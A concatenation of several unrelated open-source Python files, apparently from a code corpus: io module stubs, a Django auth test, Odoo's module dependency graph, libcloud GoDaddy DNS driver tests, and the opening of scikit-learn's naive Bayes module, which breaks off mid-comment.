newlines = property(lambda self: object()) # default
class StringIO(_TextIOBase):
"""
Text I/O implementation using an in-memory buffer.
The initial_value argument sets the value of object. The newline
argument is like the one of TextIOWrapper's constructor.
"""
def close(self, *args, **kwargs): # real signature unknown
"""
Close the IO object. Attempting any further operation after the
object is closed will raise a ValueError.
This method has no effect if the file is already closed.
"""
pass
def getvalue(self, *args, **kwargs): # real signature unknown
""" Retrieve the entire contents of the object. """
pass
def read(self, *args, **kwargs): # real signature unknown
"""
Read at most n characters, returned as a string.
If the argument is negative or omitted, read until EOF
is reached. Return an empty string at EOF.
"""
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def readline(self, *args, **kwargs): # real signature unknown
"""
Read until newline or EOF.
Returns an empty string if EOF is hit immediately.
"""
pass
def seek(self, *args, **kwargs): # real signature unknown
"""
Change stream position.
Seek to character offset pos relative to position indicated by whence:
0 Start of stream (the default). pos should be >= 0;
1 Current position - pos must be 0;
2 End of stream - pos must be 0.
Returns the new absolute position.
"""
pass
def seekable(self, *args, **kwargs): # real signature unknown
pass
def tell(self, *args, **kwargs): # real signature unknown
""" Tell the current file position. """
pass
def truncate(self, *args, **kwargs): # real signature unknown
"""
Truncate size to pos.
The pos argument defaults to the current file position, as
returned by tell(). The current file position is unchanged.
Returns the new absolute position.
"""
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def write(self, *args, **kwargs): # real signature unknown
"""
Write string to file.
Returns the number of characters written, which is always equal to
the length of the string.
"""
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __next__(self): # real signature unknown; restored from __doc__
""" x.__next__() <==> next(x) """
pass
def __setstate__(self, *args, **kwargs): # real signature unknown
pass
closed = property(lambda self: object()) # default
line_buffering = property(lambda self: object()) # default
newlines = property(lambda self: object()) # default
class TextIOWrapper(_TextIOBase):
"""
Character and line based layer over a BufferedIOBase object, buffer.
encoding gives the name of the encoding that the stream will be
decoded or encoded with. It defaults to locale.getpreferredencoding.
errors determines the strictness of encoding and decoding (see the
codecs.register) and defaults to "strict".
newline can be None, '', '\n', '\r', or '\r\n'. It controls the
handling of line endings. If it is None, universal newlines is
enabled. With this enabled, on input, the lines endings '\n', '\r',
or '\r\n' are translated to '\n' before being returned to the
caller. Conversely, on output, '\n' is translated to the system
default line seperator, os.linesep. If newline is any other of its
legal values, that newline becomes the newline when the file is read
and it is returned untranslated. On output, '\n' is converted to the
newline.
If line_buffering is True, a call to flush is implied when a call to
write contains a newline character.
"""
def close(self, *args, **kwargs): # real signature unknown
pass
def detach(self, *args, **kwargs): # real signature unknown
pass
def fileno(self, *args, **kwargs): # real signature unknown
pass
def flush(self, *args, **kwargs): # real signature unknown
pass
def isatty(self, *args, **kwargs): # real signature unknown
pass
def read(self, *args, **kwargs): # real signature unknown
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def readline(self, *args, **kwargs): # real signature unknown
pass
def seek(self, *args, **kwargs): # real signature unknown
pass
def seekable(self, *args, **kwargs): # real signature unknown
pass
def tell(self, *args, **kwargs): # real signature unknown
pass
def truncate(self, *args, **kwargs): # real signature unknown
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def write(self, *args, **kwargs): # real signature unknown
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __next__(self): # real signature unknown; restored from __doc__
""" x.__next__() <==> next(x) """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
buffer = property(lambda self: object()) # default
closed = property(lambda self: object()) # default
encoding = property(lambda self: object()) # default
errors = property(lambda self: object()) # default
line_buffering = property(lambda self: object()) # default
name = property(lambda self: object()) # default
newlines = property(lambda self: object()) # default
_CHUNK_SIZE = property(lambda self: object()) # default
class UnsupportedOperation(ValueError, IOError):
# no doc
def __init__(self, *args, **kwargs): # real signature unknown
pass
__weakref__ = property(lambda self: object()) # default
| apache-2.0 |
beezee/GAE-Django-site | django/contrib/auth/tests/models.py | 318 | 1493 | from django.conf import settings
from django.test import TestCase
from django.contrib.auth.models import User, SiteProfileNotAvailable
class ProfileTestCase(TestCase):
fixtures = ['authtestdata.json']
def setUp(self):
"""Backs up the AUTH_PROFILE_MODULE"""
self.old_AUTH_PROFILE_MODULE = getattr(settings,
'AUTH_PROFILE_MODULE', None)
def tearDown(self):
"""Restores the AUTH_PROFILE_MODULE -- if it was not set it is deleted,
otherwise the old value is restored"""
if self.old_AUTH_PROFILE_MODULE is None and \
hasattr(settings, 'AUTH_PROFILE_MODULE'):
del settings.AUTH_PROFILE_MODULE
if self.old_AUTH_PROFILE_MODULE is not None:
settings.AUTH_PROFILE_MODULE = self.old_AUTH_PROFILE_MODULE
def test_site_profile_not_available(self):
# calling get_profile without AUTH_PROFILE_MODULE set
if hasattr(settings, 'AUTH_PROFILE_MODULE'):
del settings.AUTH_PROFILE_MODULE
user = User.objects.get(username='testclient')
self.assertRaises(SiteProfileNotAvailable, user.get_profile)
# Bad syntax in AUTH_PROFILE_MODULE:
settings.AUTH_PROFILE_MODULE = 'foobar'
self.assertRaises(SiteProfileNotAvailable, user.get_profile)
# module that doesn't exist
settings.AUTH_PROFILE_MODULE = 'foo.bar'
self.assertRaises(SiteProfileNotAvailable, user.get_profile)
| bsd-3-clause |
rubencabrera/odoo | openerp/modules/graph.py | 260 | 7763 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2014 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Modules dependency graph. """
import os, sys, imp
from os.path import join as opj
import itertools
import zipimport
import openerp
import openerp.osv as osv
import openerp.tools as tools
import openerp.tools.osutil as osutil
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
import zipfile
import openerp.release as release
import re
import base64
from zipfile import PyZipFile, ZIP_DEFLATED
from cStringIO import StringIO
import logging
_logger = logging.getLogger(__name__)
class Graph(dict):
""" Modules dependency graph.
The graph is a mapping from module name to Nodes.
"""
def add_node(self, name, info):
max_depth, father = 0, None
for d in info['depends']:
n = self.get(d) or Node(d, self, None) # lazy creation, do not use default value for get()
if n.depth >= max_depth:
father = n
max_depth = n.depth
if father:
return father.add_child(name, info)
else:
return Node(name, self, info)
def update_from_db(self, cr):
if not len(self):
return
# update the graph with values from the database (if exist)
## First, we set the default values for each package in graph
additional_data = dict((key, {'id': 0, 'state': 'uninstalled', 'dbdemo': False, 'installed_version': None}) for key in self.keys())
## Then we get the values from the database
cr.execute('SELECT name, id, state, demo AS dbdemo, latest_version AS installed_version'
' FROM ir_module_module'
' WHERE name IN %s',(tuple(additional_data),)
)
## and we update the default values with values from the database
additional_data.update((x['name'], x) for x in cr.dictfetchall())
for package in self.values():
for k, v in additional_data[package.name].items():
setattr(package, k, v)
def add_module(self, cr, module, force=None):
self.add_modules(cr, [module], force)
def add_modules(self, cr, module_list, force=None):
if force is None:
force = []
packages = []
len_graph = len(self)
for module in module_list:
# This will raise an exception if no/unreadable descriptor file.
# NOTE The call to load_information_from_description_file is already
# done by db.initialize, so it is possible to not do it again here.
info = openerp.modules.module.load_information_from_description_file(module)
if info and info['installable']:
packages.append((module, info)) # TODO directly a dict, like in get_modules_with_version
else:
_logger.warning('module %s: not installable, skipped', module)
dependencies = dict([(p, info['depends']) for p, info in packages])
current, later = set([p for p, info in packages]), set()
while packages and current > later:
package, info = packages[0]
deps = info['depends']
# if all dependencies of 'package' are already in the graph, add 'package' in the graph
if reduce(lambda x, y: x and y in self, deps, True):
if not package in current:
packages.pop(0)
continue
later.clear()
current.remove(package)
node = self.add_node(package, info)
for kind in ('init', 'demo', 'update'):
if package in tools.config[kind] or 'all' in tools.config[kind] or kind in force:
setattr(node, kind, True)
else:
later.add(package)
packages.append((package, info))
packages.pop(0)
self.update_from_db(cr)
for package in later:
unmet_deps = filter(lambda p: p not in self, dependencies[package])
_logger.error('module %s: Unmet dependencies: %s', package, ', '.join(unmet_deps))
result = len(self) - len_graph
if result != len(module_list):
_logger.warning('Some modules were not loaded.')
return result
def __iter__(self):
level = 0
done = set(self.keys())
while done:
level_modules = sorted((name, module) for name, module in self.items() if module.depth==level)
for name, module in level_modules:
done.remove(name)
yield module
level += 1
def __str__(self):
return '\n'.join(str(n) for n in self if n.depth == 0)
class Node(object):
""" One module in the modules dependency graph.
Node acts as a per-module singleton. A node is constructed via
Graph.add_module() or Graph.add_modules(). Some of its fields are from
ir_module_module (setted by Graph.update_from_db()).
"""
def __new__(cls, name, graph, info):
if name in graph:
inst = graph[name]
else:
inst = object.__new__(cls)
graph[name] = inst
return inst
def __init__(self, name, graph, info):
self.name = name
self.graph = graph
self.info = info or getattr(self, 'info', {})
if not hasattr(self, 'children'):
self.children = []
if not hasattr(self, 'depth'):
self.depth = 0
@property
def data(self):
return self.info
def add_child(self, name, info):
node = Node(name, self.graph, info)
node.depth = self.depth + 1
if node not in self.children:
self.children.append(node)
for attr in ('init', 'update', 'demo'):
if hasattr(self, attr):
setattr(node, attr, True)
self.children.sort(lambda x, y: cmp(x.name, y.name))
return node
def __setattr__(self, name, value):
super(Node, self).__setattr__(name, value)
if name in ('init', 'update', 'demo'):
tools.config[name][self.name] = 1
for child in self.children:
setattr(child, name, value)
if name == 'depth':
for child in self.children:
setattr(child, name, value + 1)
def __iter__(self):
return itertools.chain(iter(self.children), *map(iter, self.children))
def __str__(self):
return self._pprint()
def _pprint(self, depth=0):
s = '%s\n' % self.name
for c in self.children:
s += '%s`-> %s' % (' ' * depth, c._pprint(depth+1))
return s
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mistio/libcloud | libcloud/test/dns/test_godaddy.py | 18 | 7260 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
from libcloud.utils.py3 import httplib
from libcloud.dns.drivers.godaddy import GoDaddyDNSDriver
from libcloud.test import MockHttp
from libcloud.test.file_fixtures import DNSFileFixtures
from libcloud.test.secrets import DNS_PARAMS_GODADDY
from libcloud.dns.base import Zone, RecordType
class GoDaddyTests(unittest.TestCase):
    """Exercises the GoDaddy DNS driver against canned JSON fixtures."""

    def setUp(self):
        # Route all driver HTTP traffic through the mock transport.
        GoDaddyMockHttp.type = None
        GoDaddyDNSDriver.connectionCls.conn_class = GoDaddyMockHttp
        self.driver = GoDaddyDNSDriver(*DNS_PARAMS_GODADDY)

    def assertHasKeys(self, dictionary, keys):
        # Helper assertion: name the first missing key in the failure.
        for wanted in keys:
            self.assertTrue(wanted in dictionary, 'key "%s" not in dictionary' %
                            (wanted))

    def _aperture_zone(self):
        # Zone matching the aperture-platform.com fixtures.
        return Zone(id='177184419',
                    domain='aperture-platform.com',
                    type='master',
                    ttl=None,
                    driver=self.driver)

    def test_list_zones(self):
        found = self.driver.list_zones()
        self.assertEqual(len(found), 5)
        first = found[0]
        self.assertEqual(first.id, '177184419')
        self.assertEqual(first.domain, 'aperture-platform.com')

    def test_ex_check_availability(self):
        result = self.driver.ex_check_availability("wazzlewobbleflooble.com")
        self.assertEqual(result.available, True)
        self.assertEqual(result.price, 14.99)

    def test_ex_list_tlds(self):
        tld_list = self.driver.ex_list_tlds()
        self.assertEqual(len(tld_list), 331)
        self.assertEqual(tld_list[0].name, 'academy')
        self.assertEqual(tld_list[0].type, 'GENERIC')

    def test_ex_get_purchase_schema(self):
        schema = self.driver.ex_get_purchase_schema('com')
        self.assertEqual(schema['id'],
                         'https://api.godaddy.com/DomainPurchase#')

    def test_ex_get_agreements(self):
        agreements = self.driver.ex_get_agreements('com')
        self.assertEqual(len(agreements), 1)
        self.assertEqual(agreements[0].title,
                         'Domain Name Registration Agreement')

    def test_ex_purchase_domain(self):
        fixtures = DNSFileFixtures('godaddy')
        request_document = fixtures.load('purchase_request.json')
        order = self.driver.ex_purchase_domain(request_document)
        self.assertEqual(order.order_id, 1)

    def test_list_records(self):
        found = self.driver.list_records(self._aperture_zone())
        self.assertEqual(len(found), 14)
        first = found[0]
        self.assertEqual(first.type, RecordType.A)
        self.assertEqual(first.name, '@')
        self.assertEqual(first.data, '50.63.202.42')
        self.assertEqual(first.id, '@:A')

    def test_get_record(self):
        record = self.driver.get_record('aperture-platform.com', 'www:A')
        self.assertEqual(record.id, 'www:A')
        self.assertEqual(record.name, 'www')
        self.assertEqual(record.type, RecordType.A)
        self.assertEqual(record.data, '50.63.202.42')

    def test_create_record(self):
        created = self.driver.create_record(zone=self._aperture_zone(),
                                            name='www',
                                            type=RecordType.A,
                                            data='50.63.202.42')
        self.assertEqual(created.id, 'www:A')
        self.assertEqual(created.name, 'www')
        self.assertEqual(created.type, RecordType.A)
        self.assertEqual(created.data, '50.63.202.42')

    def test_update_record(self):
        existing = self.driver.get_record('aperture-platform.com', 'www:A')
        updated = self.driver.update_record(record=existing,
                                            name='www',
                                            type=RecordType.A,
                                            data='50.63.202.22')
        self.assertEqual(updated.id, 'www:A')
        self.assertEqual(updated.name, 'www')
        self.assertEqual(updated.type, RecordType.A)
        self.assertEqual(updated.data, '50.63.202.22')

    def test_get_zone(self):
        zone = self.driver.get_zone('aperture-platform.com')
        self.assertEqual(zone.id, '177184419')
        self.assertEqual(zone.domain, 'aperture-platform.com')

    def test_delete_zone(self):
        self.driver.delete_zone(self._aperture_zone())
class GoDaddyMockHttp(MockHttp):
    """Mock transport: every endpoint answers 200 OK with a JSON fixture."""
    fixtures = DNSFileFixtures('godaddy')

    def _respond(self, fixture_name):
        # Shared response shape: (status, body, headers, reason).
        payload = self.fixtures.load(fixture_name)
        return (httplib.OK, payload, {}, httplib.responses[httplib.OK])

    def _v1_domains(self, method, url, body, headers):
        return self._respond('v1_domains.json')

    def _v1_domains_aperture_platform_com(self, method, url, body, headers):
        return self._respond('v1_domains_aperture_platform_com.json')

    def _v1_domains_aperture_platform_com_records(self, method, url, body, headers):
        return self._respond('v1_domains_aperture_platform_com_records.json')

    def _v1_domains_available(self, method, url, body, headers):
        return self._respond('v1_domains_available.json')

    def _v1_domains_tlds(self, method, url, body, headers):
        return self._respond('v1_domains_tlds.json')

    def _v1_domains_aperture_platform_com_records_A_www(self, method, url, body, headers):
        return self._respond('v1_domains_aperture_platform_com_records_A_www.json')

    def _v1_domains_purchase_schema_com(self, method, url, body, headers):
        return self._respond('v1_domains_purchase_schema_com.json')

    def _v1_domains_agreements(self, method, url, body, headers):
        return self._respond('v1_domains_agreements.json')

    def _v1_domains_purchase(self, method, url, body, headers):
        return self._respond('v1_domains_purchase.json')
# Allow running this test module directly; propagate unittest's exit status.
if __name__ == '__main__':
    sys.exit(unittest.main())
| apache-2.0 |
samzhang111/scikit-learn | sklearn/naive_bayes.py | 11 | 28770 | # -*- coding: utf-8 -*-
"""
The :mod:`sklearn.naive_bayes` module implements Naive Bayes algorithms. These
are supervised learning methods based on applying Bayes' theorem with strong
(naive) feature independence assumptions.
"""
# Author: Vincent Michel <vincent.michel@inria.fr>
# Minor fixes by Fabian Pedregosa
# Amit Aides <amitibo@tx.technion.ac.il>
# Yehuda Finkelstein <yehudaf@tx.technion.ac.il>
# Lars Buitinck <L.J.Buitinck@uva.nl>
# Jan Hendrik Metzen <jhm@informatik.uni-bremen.de>
# (parts based on earlier work by Mathieu Blondel)
#
# License: BSD 3 clause
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import issparse
from .base import BaseEstimator, ClassifierMixin
from .preprocessing import binarize
from .preprocessing import LabelBinarizer
from .preprocessing import label_binarize
from .utils import check_X_y, check_array
from .utils.extmath import safe_sparse_dot, logsumexp
from .utils.multiclass import _check_partial_fit_first_call
from .utils.fixes import in1d
from .utils.validation import check_is_fitted
from .externals import six
__all__ = ['BernoulliNB', 'GaussianNB', 'MultinomialNB']
class BaseNB(six.with_metaclass(ABCMeta, BaseEstimator, ClassifierMixin)):
    """Abstract base class for naive Bayes estimators"""
    @abstractmethod
    def _joint_log_likelihood(self, X):
        """Compute the unnormalized posterior log probability of X

        I.e. ``log P(c) + log P(x|c)`` for all rows x of X, as an array-like
        of shape [n_classes, n_samples]. Input is passed to
        _joint_log_likelihood as-is by predict, predict_proba and
        predict_log_proba.
        """

    def predict(self, X):
        """Perform classification on an array of test vectors X.

        Parameters
        ----------
        X : array-like, shape = [n_samples, n_features]

        Returns
        -------
        C : array, shape = [n_samples]
            Predicted target values for X
        """
        log_joint = self._joint_log_likelihood(X)
        # The class maximizing the joint log likelihood is the prediction.
        winners = np.argmax(log_joint, axis=1)
        return self.classes_[winners]

    def predict_log_proba(self, X):
        """Return log-probability estimates for the test vector X.

        Parameters
        ----------
        X : array-like, shape = [n_samples, n_features]

        Returns
        -------
        C : array-like, shape = [n_samples, n_classes]
            Returns the log-probability of the samples for each class in
            the model. The columns correspond to the classes in sorted
            order, as they appear in the attribute `classes_`.
        """
        log_joint = self._joint_log_likelihood(X)
        # Normalize by the evidence, log P(x) = logsumexp over classes.
        normalizer = logsumexp(log_joint, axis=1)
        return log_joint - np.atleast_2d(normalizer).T

    def predict_proba(self, X):
        """Return probability estimates for the test vector X.

        Parameters
        ----------
        X : array-like, shape = [n_samples, n_features]

        Returns
        -------
        C : array-like, shape = [n_samples, n_classes]
            Returns the probability of the samples for each class in
            the model. The columns correspond to the classes in sorted
            order, as they appear in the attribute `classes_`.
        """
        # Exponentiating the normalized log probabilities gives
        # probabilities that sum to one per row.
        return np.exp(self.predict_log_proba(X))
class GaussianNB(BaseNB):
    """
    Gaussian Naive Bayes (GaussianNB)
    Can perform online updates to model parameters via `partial_fit` method.
    For details on algorithm used to update feature means and variance online,
    see Stanford CS tech report STAN-CS-79-773 by Chan, Golub, and LeVeque:
    http://i.stanford.edu/pub/cstr/reports/cs/tr/79/773/CS-TR-79-773.pdf
    Read more in the :ref:`User Guide <gaussian_naive_bayes>`.
    Attributes
    ----------
    class_prior_ : array, shape (n_classes,)
        probability of each class.
    class_count_ : array, shape (n_classes,)
        number of training samples observed in each class.
    theta_ : array, shape (n_classes, n_features)
        mean of each feature per class
    sigma_ : array, shape (n_classes, n_features)
        variance of each feature per class
    Examples
    --------
    >>> import numpy as np
    >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
    >>> Y = np.array([1, 1, 1, 2, 2, 2])
    >>> from sklearn.naive_bayes import GaussianNB
    >>> clf = GaussianNB()
    >>> clf.fit(X, Y)
    GaussianNB()
    >>> print(clf.predict([[-0.8, -1]]))
    [1]
    >>> clf_pf = GaussianNB()
    >>> clf_pf.partial_fit(X, Y, np.unique(Y))
    GaussianNB()
    >>> print(clf_pf.predict([[-0.8, -1]]))
    [1]
    """
    def fit(self, X, y, sample_weight=None):
        """Fit Gaussian Naive Bayes according to X, y
        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            Training vectors, where n_samples is the number of samples
            and n_features is the number of features.
        y : array-like, shape (n_samples,)
            Target values.
        sample_weight : array-like, shape (n_samples,), optional
            Weights applied to individual samples (1. for unweighted).
        Returns
        -------
        self : object
            Returns self.
        """
        X, y = check_X_y(X, y)
        # A full fit is a refitting partial fit over all the data with the
        # class set inferred from y (_refit=True discards previous state).
        return self._partial_fit(X, y, np.unique(y), _refit=True,
                                 sample_weight=sample_weight)
    @staticmethod
    def _update_mean_variance(n_past, mu, var, X, sample_weight=None):
        """Compute online update of Gaussian mean and variance.
        Given starting sample count, mean, and variance, a new set of
        points X, and optionally sample weights, return the updated mean and
        variance. (NB - each dimension (column) in X is treated as independent
        -- you get variance, not covariance).
        Can take scalar mean and variance, or vector mean and variance to
        simultaneously update a number of independent Gaussians.
        See Stanford CS tech report STAN-CS-79-773 by Chan, Golub, and LeVeque:
        http://i.stanford.edu/pub/cstr/reports/cs/tr/79/773/CS-TR-79-773.pdf
        Parameters
        ----------
        n_past : int
            Number of samples represented in old mean and variance. If sample
            weights were given, this should contain the sum of sample
            weights represented in old mean and variance.
        mu : array-like, shape (number of Gaussians,)
            Means for Gaussians in original set.
        var : array-like, shape (number of Gaussians,)
            Variances for Gaussians in original set.
        X : array-like, shape (n_samples, n_features)
            New data points to fold into the running statistics.
        sample_weight : array-like, shape (n_samples,), optional
            Weights applied to individual samples (1. for unweighted).
        Returns
        -------
        total_mu : array-like, shape (number of Gaussians,)
            Updated mean for each Gaussian over the combined set.
        total_var : array-like, shape (number of Gaussians,)
            Updated variance for each Gaussian over the combined set.
        """
        # No new points: running statistics are unchanged.
        if X.shape[0] == 0:
            return mu, var
        # Compute (potentially weighted) mean and variance of new datapoints
        if sample_weight is not None:
            n_new = float(sample_weight.sum())
            new_mu = np.average(X, axis=0, weights=sample_weight / n_new)
            new_var = np.average((X - new_mu) ** 2, axis=0,
                                 weights=sample_weight / n_new)
        else:
            n_new = X.shape[0]
            new_var = np.var(X, axis=0)
            new_mu = np.mean(X, axis=0)
        # First batch ever: the batch statistics are the totals.
        if n_past == 0:
            return new_mu, new_var
        n_total = float(n_past + n_new)
        # Combine mean of old and new data, taking into consideration
        # (weighted) number of observations
        total_mu = (n_new * new_mu + n_past * mu) / n_total
        # Combine variance of old and new data, taking into consideration
        # (weighted) number of observations. This is achieved by combining
        # the sum-of-squared-differences (ssd)
        old_ssd = n_past * var
        new_ssd = n_new * new_var
        total_ssd = (old_ssd + new_ssd +
                     (n_past / float(n_new * n_total)) *
                     (n_new * mu - n_new * new_mu) ** 2)
        total_var = total_ssd / n_total
        return total_mu, total_var
    def partial_fit(self, X, y, classes=None, sample_weight=None):
        """Incremental fit on a batch of samples.
        This method is expected to be called several times consecutively
        on different chunks of a dataset so as to implement out-of-core
        or online learning.
        This is especially useful when the whole dataset is too big to fit in
        memory at once.
        This method has some performance and numerical stability overhead,
        hence it is better to call partial_fit on chunks of data that are
        as large as possible (as long as fitting in the memory budget) to
        hide the overhead.
        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            Training vectors, where n_samples is the number of samples and
            n_features is the number of features.
        y : array-like, shape (n_samples,)
            Target values.
        classes : array-like, shape (n_classes,)
            List of all the classes that can possibly appear in the y vector.
            Must be provided at the first call to partial_fit, can be omitted
            in subsequent calls.
        sample_weight : array-like, shape (n_samples,), optional
            Weights applied to individual samples (1. for unweighted).
        Returns
        -------
        self : object
            Returns self.
        """
        return self._partial_fit(X, y, classes, _refit=False,
                                 sample_weight=sample_weight)
    def _partial_fit(self, X, y, classes=None, _refit=False,
                     sample_weight=None):
        """Actual implementation of Gaussian NB fitting.
        Parameters
        ----------
        X : array-like, shape (n_samples, n_features)
            Training vectors, where n_samples is the number of samples and
            n_features is the number of features.
        y : array-like, shape (n_samples,)
            Target values.
        classes : array-like, shape (n_classes,)
            List of all the classes that can possibly appear in the y vector.
            Must be provided at the first call to partial_fit, can be omitted
            in subsequent calls.
        _refit: bool
            If true, act as though this were the first time we called
            _partial_fit (ie, throw away any past fitting and start over).
        sample_weight : array-like, shape (n_samples,), optional
            Weights applied to individual samples (1. for unweighted).
        Returns
        -------
        self : object
            Returns self.
        """
        X, y = check_X_y(X, y)
        # If the ratio of data variance between dimensions is too small, it
        # will cause numerical errors. To address this, we artificially
        # boost the variance by epsilon, a small fraction of the standard
        # deviation of the largest dimension.
        epsilon = 1e-9 * np.var(X, axis=0).max()
        if _refit:
            self.classes_ = None
        if _check_partial_fit_first_call(self, classes):
            # This is the first call to partial_fit:
            # initialize various cumulative counters
            n_features = X.shape[1]
            n_classes = len(self.classes_)
            self.theta_ = np.zeros((n_classes, n_features))
            self.sigma_ = np.zeros((n_classes, n_features))
            self.class_prior_ = np.zeros(n_classes)
            self.class_count_ = np.zeros(n_classes)
        else:
            if X.shape[1] != self.theta_.shape[1]:
                msg = "Number of features %d does not match previous data %d."
                raise ValueError(msg % (X.shape[1], self.theta_.shape[1]))
            # Put epsilon back in each time
            # (it was added at the end of the previous call; remove it so the
            # running variances are unbiased before the next merge).
            self.sigma_[:, :] -= epsilon
        classes = self.classes_
        unique_y = np.unique(y)
        unique_y_in_classes = in1d(unique_y, classes)
        if not np.all(unique_y_in_classes):
            raise ValueError("The target label(s) %s in y do not exist in the "
                             "initial classes %s" %
                             (y[~unique_y_in_classes], classes))
        # Merge each class's batch statistics into the running mean/variance.
        for y_i in unique_y:
            i = classes.searchsorted(y_i)
            X_i = X[y == y_i, :]
            if sample_weight is not None:
                sw_i = sample_weight[y == y_i]
                N_i = sw_i.sum()
            else:
                sw_i = None
                N_i = X_i.shape[0]
            new_theta, new_sigma = self._update_mean_variance(
                self.class_count_[i], self.theta_[i, :], self.sigma_[i, :],
                X_i, sw_i)
            self.theta_[i, :] = new_theta
            self.sigma_[i, :] = new_sigma
            self.class_count_[i] += N_i
        # Re-apply the variance floor and refresh the empirical class priors.
        self.sigma_[:, :] += epsilon
        self.class_prior_[:] = self.class_count_ / np.sum(self.class_count_)
        return self
    def _joint_log_likelihood(self, X):
        """Per-class log P(c) + sum of per-feature Gaussian log densities."""
        check_is_fitted(self, "classes_")
        X = check_array(X)
        joint_log_likelihood = []
        for i in range(np.size(self.classes_)):
            jointi = np.log(self.class_prior_[i])
            # Log of the Gaussian density, split into normalization constant
            # and the quadratic term, summed over features.
            n_ij = - 0.5 * np.sum(np.log(2. * np.pi * self.sigma_[i, :]))
            n_ij -= 0.5 * np.sum(((X - self.theta_[i, :]) ** 2) /
                                 (self.sigma_[i, :]), 1)
            joint_log_likelihood.append(jointi + n_ij)
        joint_log_likelihood = np.array(joint_log_likelihood).T
        return joint_log_likelihood
class BaseDiscreteNB(BaseNB):
    """Abstract base class for naive Bayes on discrete/categorical data
    Any estimator based on this class should provide:
    __init__
    _joint_log_likelihood(X) as per BaseNB
    """
    def _update_class_log_prior(self, class_prior=None):
        # Recompute class_log_prior_ from an explicit prior, the empirical
        # class counts, or a uniform distribution, in that order.
        n_classes = len(self.classes_)
        if class_prior is not None:
            if len(class_prior) != n_classes:
                raise ValueError("Number of priors must match number of"
                                 " classes.")
            self.class_log_prior_ = np.log(class_prior)
        elif self.fit_prior:
            # empirical prior, with sample_weight taken into account
            self.class_log_prior_ = (np.log(self.class_count_)
                                     - np.log(self.class_count_.sum()))
        else:
            self.class_log_prior_ = np.zeros(n_classes) - np.log(n_classes)
    def partial_fit(self, X, y, classes=None, sample_weight=None):
        """Incremental fit on a batch of samples.
        This method is expected to be called several times consecutively
        on different chunks of a dataset so as to implement out-of-core
        or online learning.
        This is especially useful when the whole dataset is too big to fit in
        memory at once.
        This method has some performance overhead hence it is better to call
        partial_fit on chunks of data that are as large as possible
        (as long as fitting in the memory budget) to hide the overhead.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape = [n_samples, n_features]
            Training vectors, where n_samples is the number of samples and
            n_features is the number of features.
        y : array-like, shape = [n_samples]
            Target values.
        classes : array-like, shape = [n_classes]
            List of all the classes that can possibly appear in the y vector.
            Must be provided at the first call to partial_fit, can be omitted
            in subsequent calls.
        sample_weight : array-like, shape = [n_samples], optional
            Weights applied to individual samples (1. for unweighted).
        Returns
        -------
        self : object
            Returns self.
        """
        X = check_array(X, accept_sparse='csr', dtype=np.float64)
        _, n_features = X.shape
        if _check_partial_fit_first_call(self, classes):
            # This is the first call to partial_fit:
            # initialize various cumulative counters
            n_effective_classes = len(classes) if len(classes) > 1 else 2
            self.class_count_ = np.zeros(n_effective_classes, dtype=np.float64)
            self.feature_count_ = np.zeros((n_effective_classes, n_features),
                                           dtype=np.float64)
        elif n_features != self.coef_.shape[1]:
            msg = "Number of features %d does not match previous data %d."
            # Consistency: report the same dimension that was compared above
            # (shape[1]); the previous shape[-1] was equivalent for the 2-D
            # coef_ but obscured the intent.
            raise ValueError(msg % (n_features, self.coef_.shape[1]))
        Y = label_binarize(y, classes=self.classes_)
        if Y.shape[1] == 1:
            # Binary problem: expand the single indicator column into
            # explicit (negative, positive) columns.
            Y = np.concatenate((1 - Y, Y), axis=1)
        n_samples, n_classes = Y.shape
        if X.shape[0] != Y.shape[0]:
            msg = "X.shape[0]=%d and y.shape[0]=%d are incompatible."
            raise ValueError(msg % (X.shape[0], y.shape[0]))
        # label_binarize() returns arrays with dtype=np.int64.
        # We convert it to np.float64 to support sample_weight consistently
        Y = Y.astype(np.float64)
        if sample_weight is not None:
            sample_weight = np.atleast_2d(sample_weight)
            Y *= check_array(sample_weight).T
        class_prior = self.class_prior
        # Count raw events from data before updating the class log prior
        # and feature log probas
        self._count(X, Y)
        # XXX: OPTIM: we could introduce a public finalization method to
